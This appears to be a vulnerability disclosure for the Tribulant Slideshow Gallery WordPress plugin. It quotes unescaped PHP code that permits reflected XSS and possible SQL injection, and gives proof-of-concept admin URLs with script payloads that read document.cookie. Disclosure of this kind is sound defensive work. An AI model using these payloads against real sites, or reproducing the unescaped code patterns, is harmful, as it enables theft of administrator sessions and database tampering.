Tribulant Slideshow Gallery 1.5.3.4 Reflected XSS

Homepage:

https://wordpress.org/plugins/slideshow-gallery/

Description:

$_GET['order'] is not escaped.

File: slideshow-gallery\views\admin\galleries\index.php

$orderby = (empty($_GET['orderby'])) ? 'modified' : $_GET['orderby'];
$order = (empty($_GET['order'])) ? 'desc' : strtolower($_GET['order']);

<th class="column-id <?php echo ($orderby == "id") ? 'sorted ' . $order : 'sortable desc'; ?>">
<th class="column-title <?php echo ($orderby == "title") ? 'sorted ' . $order : 'sortable desc'; ?>">
<th class="column-modified <?php echo ($orderby == "modified") ? 'sorted ' . $order : 'sortable desc'; ?>">

This value can be also used for SQL injection:

File: slideshow-gallery\vendors\class.paginate.php

list($osortby, $osort) = $this -> order;
$query .= " ORDER BY `" . $osortby . "` " . $osort . " LIMIT " . $this -> begRecord . " , " . $this -> per_page . ";";

In Pro version, if you have more than 10 galleries, $_GET['Gallerypage'] is not escaped.

File: slideshow-gallery\vendors\class.paginate.php

$this -> pagination .= '<input class="slideshow-paged-input current-page" type="text" name="paged" id="paged-input" value="' . $this -> page . '" size="1"> ';

Proof of Concept:

XSS are visible for administrator.

http://wp/wp-admin/admin.php?page=slideshow-galleries&orderby=modified&order=asc-- \"><script>alert(document.cookie);</script>

If you have PRO version and more than 10 galleries:

http://wp/wp-admin/admin.php?page=slideshow-galleries&Gallerypage=\"><script>alert(document.cookie);</script>

Timeline: